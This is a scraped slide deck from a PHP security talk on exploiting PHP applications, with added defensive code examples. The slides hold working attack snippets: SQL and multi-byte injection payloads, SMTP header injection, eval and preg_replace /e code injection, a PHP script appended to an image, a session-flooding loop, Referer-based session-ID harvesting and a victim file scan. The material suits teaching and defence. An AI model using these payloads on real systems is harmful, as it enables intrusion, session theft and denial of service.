Exploiting PHP with PHP

Arpad Ray @ PHPNW08

Upload: vishal-dwivedi

Post on 02-Jun-2018


Page 1: Exploiting Php With Php 090310160027 Phpapp01

8/10/2019 Exploiting Php With Php 090310160027 Phpapp01

http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 1/71

Exploiting PHP with PHP

Arpad Ray @ PHPNW08


Why use PHP for this?

• We already know how to write PHP
• Can use directly in test scripts
• PHP provides everything we need
• Writing PHP can be very quick
• Can efficiently re-use and combine attacks


SQL injection

• Probably the first attack most PHP developers hear of

Page 8: Exploiting Php With Php 090310160027 Phpapp01

8/10/2019 Exploiting Php With Php 090310160027 Phpapp01

http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 8/71

Exploiting PHPwith PHP

SQL injection

$q = "SELECT * FROM foobar WHERE id = $_GET[id]";

Page 9: Exploiting Php With Php 090310160027 Phpapp01

8/10/2019 Exploiting Php With Php 090310160027 Phpapp01

http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 9/71

Exploiting PHPwith PHP

SQL injection

$q = "SELECT * FROM foobar WHERE id = $_GET[id]";

index.php?id=1 OR 1=1$_GET['id'] = '1 OR 1=1';

Page 10: Exploiting Php With Php 090310160027 Phpapp01

8/10/2019 Exploiting Php With Php 090310160027 Phpapp01

http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 10/71

Exploiting PHPwith PHP

SQL injection

$q = "SELECT * FROM foobar WHERE id = $_GET[id]";

index.php?id=1 OR 1=1
$_GET['id'] = '1 OR 1=1';

$q = "SELECT * FROM foobar WHERE id = 1 OR 1=1";


SQL injection

$q = "SELECT * FROM foobar WHERE id = '$_GET[id]'";

index.php?id=' OR ''='
$_GET['id'] = "' OR ''='";

$q = "SELECT * FROM foobar WHERE id = '' OR ''=''";


SQL injection

$q = "SELECT * FROM foobar WHERE id = '$_POST[id]'";


SQL injection

$q = "SELECT * FROM foobar WHERE id = $_POST[id]";

<form method="post" action="http://example.com/foo.php">
  <input type="hidden" name="id" value="1 OR 1=1" />
  <input type="submit" />
</form>


SQL injection

$q = "SELECT * FROM foobar WHERE id = $_POST[id]";

// same POST sent from PHP instead of a browser form
// (HTTP method names are case-sensitive, so 'POST', not 'post')
$context = stream_context_create(array('http' => array(
    'method'  => 'POST',
    'content' => 'id=1 OR 1=1'
)));
file_get_contents('http://example.com/foo.php', false, $context);


SQL injection

$q = 'SELECT * FROM foobar WHERE id = ' . addslashes($id);


addslashes()

$id = addslashes($_POST['id']);
$q = "SELECT * FROM foobar WHERE id = '$id'";

$_POST['id'] = "' OR ''='";

$q = "SELECT * FROM foobar WHERE id = '\' OR \'\'=\''";


addslashes()

• Getting around that pesky backslash
• Multi-byte character attacks
• Swallow the backslash with a multi-byte character ending with that byte
• <start of mb character><single quote>
  // apply addslashes()
  <mb character><single quote>


addslashes()

$mbCharacter = "\xBF\x5C";
$quote = substr($mbCharacter, 0, -1) . '\'';   // lead byte followed by a quote

$id = "$quote OR $quote$quote = $quote";
$context = stream_context_create(array('http' => array(
    'method'  => 'POST',
    'content' => http_build_query(array('id' => $id))
)));
file_get_contents('http://example.com/foo.php', false, $context);

// on the server, after addslashes(), "?" stands for the two-byte character
// that swallowed the backslash:
$q = "SELECT * FROM foobar WHERE id = '?' OR '?'='?'";


addslashes()

$mbCharacter = "\xBF\x5C";
$quote = substr($mbCharacter, 0, -1) . '\'';

$id = "$quote OR 1=1 /* ";
$context = stream_context_create(array('http' => array(
    'method'  => 'POST',
    'content' => http_build_query(array('id' => $id))
)));
file_get_contents('http://example.com/foo.php', false, $context);

// the comment opener discards the rest of the query, including the closing quote:
$q = "SELECT * FROM foobar WHERE id = '?' OR 1=1 /* '";
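The two slides above show addslashes() failing against a multi-byte lead byte. As an added example (not from the talk), the following PHP script shows the bytes addslashes() actually produces for that input and the prepared-statement form of the foobar lookup, which needs no escaping at all; it assumes PHP's bundled pdo_sqlite driver and constructs its own table.

```php
<?php
// Added example, not from the slides. Assumes the pdo_sqlite driver (bundled with
// PHP); the foobar table and its rows are constructed here.

// What addslashes() does to the slides' payload: a GBK lead byte (0xBF) and a
// single quote. The inserted backslash (0x5C) becomes the trail byte of a
// two-byte character, so a GBK-aware SQL parser still sees a bare quote.
function addslashes_hex(string $input): string
{
    return strtoupper(bin2hex(addslashes($input)));
}

// The slides' form: escaping plus interpolation into the SQL text.
function query_with_addslashes(string $id): string
{
    $id = addslashes($id);
    return "SELECT * FROM foobar WHERE id = '$id'";
}

// Hardened form: the id is validated, then bound as a parameter. The value never
// becomes part of the SQL text, so client escaping and server charset no longer matter.
function find_by_id(PDO $pdo, string $id): array
{
    if (!preg_match('/^[0-9]+$/D', $id)) {
        return [];          // reject anything that is not a plain integer id
    }
    $stmt = $pdo->prepare('SELECT id, name FROM foobar WHERE id = :id');
    $stmt->execute([':id' => (int) $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function build_fixture(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE foobar (id INTEGER PRIMARY KEY, name TEXT)');
    $pdo->exec("INSERT INTO foobar (id, name) VALUES (1, 'alice'), (2, 'bob')");
    return $pdo;
}

$pdo = build_fixture();
echo 'addslashes("\xBF\'") bytes: ', addslashes_hex("\xBF'"), "\n";   // BF5C27

// The slides' inputs, plain and with the multi-byte prefix. With the prepared
// statement only the plain "1" returns a row; the rest return none.
$inputs = ['1', '1 OR 1=1', "' OR ''='", "\xBF' OR 1=1 /* "];
foreach ($inputs as $in) {
    printf("%-36s rows=%d   escaped query: %s\n",
        bin2hex($in),
        count(find_by_id($pdo, $in)),
        addcslashes(query_with_addslashes($in), "\x80..\xff"));   // high bytes shown as octal escapes
}
```

Where a prepared statement is not an option, the escape must come from the database client with the connection charset set (for MySQL, mysqli_set_charset() followed by mysqli_real_escape_string()), never from addslashes().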


magic_quotes_gpc

• Uses addslashes() so escaping is not secure
• Fosters complacency
• Applications using magic quotes are much harder to make truly portable
• Inconsistencies between PHP versions


magic_quotes_gpc

// request headers are not covered by magic quotes: $foo arrives unescaped in $_SERVER
$context = stream_context_create(array('http' => array(
    'user_agent' => $foo
)));

$context = stream_context_create(array('http' => array(
    'method' => 'GET',
    'header' => 'X-Foo: ' . $foo
)));


magic_quotes_gpc

?scalar'1=foo&array'1[scalar'2]=foo&array'1[array'2][scalar'3]=foo


magic_quotes_gpc

• Expected result:

Array
(
    [scalar\'1] => foo
    [array\'1] => Array
        (
            [scalar\'2] => foo
            [array\'2] => Array
                (
                    [scalar\'3] => foo
                )
        )
)


magic_quotes_gpc

• PHP 4.3.3

Array
(
    [scalar'1] => foo
    [array'1] => Array
        (
            [scalar'2] => foo
            [array\'2] => Array
                (
                    [scalar'3] => foo
                )
        )
)


magic_quotes_gpc

• PHP 5.0.0 (OFF)

Array
(
    [scalar\'1] => foo
    [array\'1] => Array
        (
            [scalar\'2] => foo
            [array\'2] => Array
                (
                    [scalar\'3] => foo
                )
        )
)


magic_quotes_gpc

• PHP 5.2.2

Array
(
    [scalar\'1] => foo
    [array\'1] => Array
        (
            [scalar\'2] => foo
            [array\'2] => Array
                (
                    [scalar\'3] => foo
                )
        )
)


magic_quotes_gpc

• There are also problems disabling magic_quotes_gpc

function stripslashes_deep($value)
{
    $value = is_array($value)
        ? array_map('stripslashes_deep', $value)
        : stripslashes($value);
    return $value;
}


• Instead of passing id=1 we can pass:
  'id' . str_repeat('[]', 1000) . '=1'
• We can trivially force the web server to do a lot of unnecessary work
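The nested-array trick above works against any unbounded recursive walk of request input, not just stripslashes_deep(). Added example, not from the talk: the same function with a depth limit, exercised on an input built the way id[][]...=1 would be parsed (the array is constructed in the script; PHP's own max_input_nesting_level, default 64, already drops request variables nested deeper than that, and magic quotes themselves were removed in PHP 5.4).

```php
<?php
// Added example, not from the slides: stripslashes_deep() from the talk with an
// explicit depth bound, so a deeply nested request variable is rejected instead
// of being walked. The bound is the part that carries over to any recursive
// processing of untrusted input; the slash stripping itself is legacy only.

final class InputTooDeep extends RuntimeException {}

/**
 * Strip slashes from a scalar or a (nested) array, refusing input nested deeper
 * than $maxDepth levels. $depth is an internal counter.
 */
function stripslashes_bounded($value, int $maxDepth = 16, int $depth = 0)
{
    if ($depth > $maxDepth) {
        throw new InputTooDeep("input nested deeper than $maxDepth levels");
    }
    if (is_array($value)) {
        $out = [];
        foreach ($value as $k => $v) {
            $out[$k] = stripslashes_bounded($v, $maxDepth, $depth + 1);
        }
        return $out;
    }
    return is_string($value) ? stripslashes($value) : $value;
}

// Constructed stand-in for what id[][]...[]=1 with $levels brackets would
// produce in $_GET: $levels arrays wrapped around the string "1".
function nested_input(int $levels): array
{
    $v = ['1'];
    for ($i = 1; $i < $levels; $i++) {
        $v = [$v];
    }
    return $v;
}

function demo(): array
{
    $results = [];
    // Ordinary escaped input (two levels deep) is processed as before.
    $results['shallow'] = stripslashes_bounded(['id' => "O\\'Reilly", 'tags' => ["a\\'b"]]);
    // The slides' 1000-level payload is rejected at level 17 instead of being walked.
    try {
        stripslashes_bounded(nested_input(1000));
        $results['deep'] = 'processed';
    } catch (InputTooDeep $e) {
        $results['deep'] = 'rejected: ' . $e->getMessage();
    }
    return $results;
}

print_r(demo());
```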


Denial of Service

• Failure to release resources
• Writing user data to disk

function fill_sessions($url, $num = 1000)
{
    $context = stream_context_create(array(
        'http' => array('method' => 'HEAD')
    ));
    for ($i = $num; $i--;) {
        file_get_contents($url, false, $context);
    }
}


• Locking customer accounts


SMTP injection

$to = '[email protected]';
$subject = $_POST['subject'];
$from = $_POST['from'];
$body = $_POST['message'];
// the user-controlled From value goes into the additional_headers argument
mail($to, $subject, $body, 'From: ' . $from);


SMTP injection

$context = stream_context_create(array('http' => array(
    'method'  => 'POST',
    'content' => http_build_query(array(
        'subject' => "foo\r\nCc: [email protected]",
        'from'    => "[email protected]\r\nCc: [email protected]"
    ))
)));


SMTP injection

• Variable mail address
• Sanitisation
• Validation
• /^[^@]+@(?:\w+\.)+\w{2,6}$/
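As an added example (not from the talk), the validation on the last slide applied to the From value before it reaches mail(): line breaks are rejected outright and the regex is anchored with the D modifier, because without it $ also matches before a trailing newline. The addresses are constructed for the demo and send_contact_mail() is a hypothetical wrapper.

```php
<?php
// Added example, not from the slides. Validates a user-supplied address before
// it is placed in a mail header, using the slides' regex. Sample values are constructed.

function is_safe_header_address(string $addr): bool
{
    // A header value must be a single line; reject any line break or NUL early.
    if (preg_match('/[\r\n\0]/', $addr)) {
        return false;
    }
    // The slides' pattern, anchored with D so "$" means end of string only.
    return (bool) preg_match('/^[^@]+@(?:\w+\.)+\w{2,6}$/D', $addr);
}

// The slides' pattern without D, kept only to show the trailing-newline gap.
function matches_slide_pattern(string $addr): bool
{
    return (bool) preg_match('/^[^@]+@(?:\w+\.)+\w{2,6}$/', $addr);
}

// Hypothetical wrapper: refuses to build a From: header from unvalidated input.
function send_contact_mail(string $to, string $subject, string $from, string $body): bool
{
    if (!is_safe_header_address($from)) {
        return false;
    }
    // The subject is a header too: flatten line breaks rather than trusting it.
    $subject = str_replace(["\r", "\n"], ' ', $subject);
    return mail($to, $subject, $body, 'From: ' . $from);
}

$cases = [
    'user@example.com',                              // well-formed
    "user@example.com\r\nCc: victim@example.org",    // the slides' injection
    "user@example.com\n",                            // trailing newline: slide regex accepts it
    'no-at-sign',                                    // malformed
];
foreach ($cases as $c) {
    printf("%-48s safe=%-5s slide-regex=%s\n", json_encode($c),
        var_export(is_safe_header_address($c), true),
        var_export(matches_slide_pattern($c), true));
}
```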


Hot vulnerabilities

• Direct eval() injection

class Foo {
    function Foo() {
        $a = func_get_args();
        print_r($a);
    }
}

eval('$foo = new Foo(' . implode(',', $args) . ');');


• Direct eval() injection

$args[0] = 'readfile("/etc/passed")';


• preg_replace() using /e modifier

$s = '$-42 dollars';
preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s);
// result: '42'


• preg_replace() using /e modifier

$s = '$1).foobar().abs(1 dollars';
preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s);
// result: '4242'


• preg_replace() using /e modifier

$s = '$1).readfile(chr(47).chr(101)...abs(1 dollars';
preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s);
// result: '4242'
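The /e modifier hands the substituted replacement string to eval(), which is what the three slides above exploit; it was deprecated in PHP 5.5 and removed in PHP 7.0. As an added example (not from the talk), here is the same replacement done with preg_replace_callback(), where the capture is data rather than code, run against the talk's benign and injected inputs.

```php
<?php
// Added example, not from the slides: the slides' abs($1) replacement without /e.
// With /e the capture is spliced into a string that is then eval()ed, so the
// capture is code. The callback receives it as a plain string instead.

function abs_dollars(string $s): string
{
    return preg_replace_callback(
        '/\$(.*?) dollars/',
        function (array $m): string {
            // Whatever was captured is coerced to a number, never evaluated.
            // A capture such as "1).foobar().abs(1" simply becomes 1.
            return (string) abs((int) $m[1]);
        },
        $s
    );
}

$inputs = [
    '$-42 dollars',                   // the slides' benign input
    '$1).foobar().abs(1 dollars',     // the slides' injection: foobar() is never called
    'no amount here',                 // no match: returned unchanged
];
foreach ($inputs as $in) {
    printf("%-32s -> %s\n", $in, abs_dollars($in));
}
// prints:  $-42 dollars -> 42,  $1).foobar().abs(1 dollars -> 1,  no amount here -> no amount here
```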


• Variable in include() call

$page = $_GET['page'];
include $page;


• Uploading PHP files
  • Check file extension
  • Check uploaded MIME type
  • Check file MIME type
  • Move outside of web root


$script = <<<EOT
<?php
var_dump('hello world!');
EOT;
$jpeg = '/path/to/some_valid.jpg';

$fp = fopen($jpeg, 'ab');
fwrite($fp, $script);
fclose($fp);
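The appended-script trick above passes an extension check and both MIME checks, which is why the last bullet, storing the file where it can never be executed, is the real control. Added example, not from the talk: a store_upload() helper (hypothetical name) that enforces that, plus a trailing-data check that catches this particular trick; the JPEG bytes are a constructed minimal SOI/EOI stand-in, and $uploadDir is assumed to be outside the document root.

```php
<?php
// Added example, not from the slides. The file contents are constructed; in a real
// handler $tmpPath is $_FILES['f']['tmp_name'] and move_uploaded_file() replaces rename().

// Heuristic: a JPEG should end at its EOI marker (FF D9); bytes after it are where
// an appended script lives. A detection aid only: a payload can also sit inside a
// comment segment and pass this check, so storage location remains the control.
function jpeg_has_trailing_data(string $bytes): bool
{
    if (strncmp($bytes, "\xFF\xD8", 2) !== 0) {
        return true;                                // not a JPEG at all
    }
    $eoi = strrpos($bytes, "\xFF\xD9");
    return $eoi === false || $eoi + 2 !== strlen($bytes);
}

// The control: move the file to a directory the web server does not serve, under
// a name the uploader did not choose, with a fixed extension. Returns the new path
// or null when the upload is refused.
function store_upload(string $tmpPath, string $uploadDir, string $originalName): ?string
{
    $ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg'], true)) {
        return null;
    }
    $bytes = file_get_contents($tmpPath);
    if ($bytes === false || jpeg_has_trailing_data($bytes)) {
        return null;
    }
    $dest = $uploadDir . '/' . bin2hex(random_bytes(16)) . '.jpg';
    return rename($tmpPath, $dest) ? $dest : null;
}

function demo(): array
{
    $minimalJpeg = "\xFF\xD8\xFF\xD9";                 // constructed stand-in for a valid JPEG
    $script      = "<?php var_dump('hello world!');";   // the slides' payload
    $dir = sys_get_temp_dir() . '/uploads_' . bin2hex(random_bytes(4));   // stand-in for a non-served dir
    mkdir($dir, 0700);

    $clean = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($clean, $minimalJpeg);
    $tainted = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tainted, $minimalJpeg . $script);

    $php = store_upload($clean, $dir, 'photo.php');     // wrong extension: refused, file untouched
    $ok  = store_upload($clean, $dir, 'photo.jpg');     // accepted and moved
    $bad = store_upload($tainted, $dir, 'photo.jpg');   // trailing script: refused
    unlink($tainted);

    return [
        'php ext stored' => $php !== null,   // false
        'clean stored'   => $ok !== null,    // true
        'tainted stored' => $bad !== null,   // false
    ];
}

print_r(demo());
```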


Hot vulnerabilities

• Direct eval() injection
• preg_replace() using /e modifier
• Variable in include() call
• Uploading PHP files


Making an evil website

• HTTP requests can give us lots of interesting information
• PHPSESSID = bingo


Making an evil website

// the Referer header of the incoming request lives in $_SERVER, not $_SESSION
if (isset($_SERVER['HTTP_REFERER'])) {
    if (preg_match('/PHPSESSID=([^=&]+)|(?<==)([a-f\d]{32}|[a-f\d]{40})\b/xi',
                   $_SERVER['HTTP_REFERER'], $matches)) {
        // $matches holds the session id carried in the referring URL
    }
}
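Both the session-filling loop in the Denial of Service section and the Referer harvesting above depend on how PHP sessions are configured. As an added example, not from the talk, the following bootstrap sets the session options that keep the id out of URLs and out of page scripts, starts a session only when the client already holds one, and scans a URL for session-id-shaped parameters using the talk's own id pattern; the sample URLs are constructed.

```php
<?php
// Added example, not from the slides. All functions are hypothetical helpers;
// the ini keys are PHP's own session settings.

// Run before any session_start(). ini_set() works for these at runtime; the same
// keys can go in php.ini.
function harden_session_config(): void
{
    ini_set('session.use_only_cookies', '1');   // never read the id from GET/POST
    ini_set('session.use_trans_sid', '0');      // never rewrite links to carry the id
    ini_set('session.cookie_httponly', '1');    // keep the cookie away from page scripts
    ini_set('session.cookie_secure', '1');      // send it over HTTPS only
    ini_set('session.cookie_samesite', 'Lax');  // PHP 7.3+
    ini_set('session.use_strict_mode', '1');    // reject ids the server never issued (PHP 5.5.2+)
}

// Against the HEAD-request session flood: create a session file only when the
// client already presents a cookie, or when this code path really needs one.
function session_start_if_present(bool $required = false): bool
{
    if ($required || isset($_COOKIE[session_name()])) {
        return session_start();
    }
    return false;
}

// Defensive use of the slides' own pattern: scan outbound links or logged referers
// for session-id-shaped query parameters. Returns the parameter names, not the ids.
function session_id_leaks(string $url): array
{
    $query = parse_url($url, PHP_URL_QUERY);
    if (!is_string($query)) {
        return [];
    }
    parse_str($query, $params);
    $leaks = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue;
        }
        $isSessionName = strcasecmp($name, 'PHPSESSID') === 0;
        $looksLikeId   = (bool) preg_match('/^[a-f\d]{32}$|^[a-f\d]{40}$/i', $value);
        if ($isSessionName || $looksLikeId) {
            $leaks[] = $name;
        }
    }
    return $leaks;
}

harden_session_config();

$samples = [   // constructed
    'https://example.com/page.php?id=7',
    'https://example.com/page.php?PHPSESSID=' . str_repeat('a', 32),
    'https://example.com/cart.php?token=' . str_repeat('0', 40) . '&x=1',
];
foreach ($samples as $u) {
    printf("%-72s leaks: %s\n", $u, implode(',', session_id_leaks($u)) ?: 'none');
}
```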


Making use of victims

• File scan

$dir = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator('/', true)
);
foreach ($dir as $file) {
    echo $file->getPathname(), "\n";
}


• File scan
• Subverting existing files
• Escalate privileges, take over machine
• botnet.php

Questions?
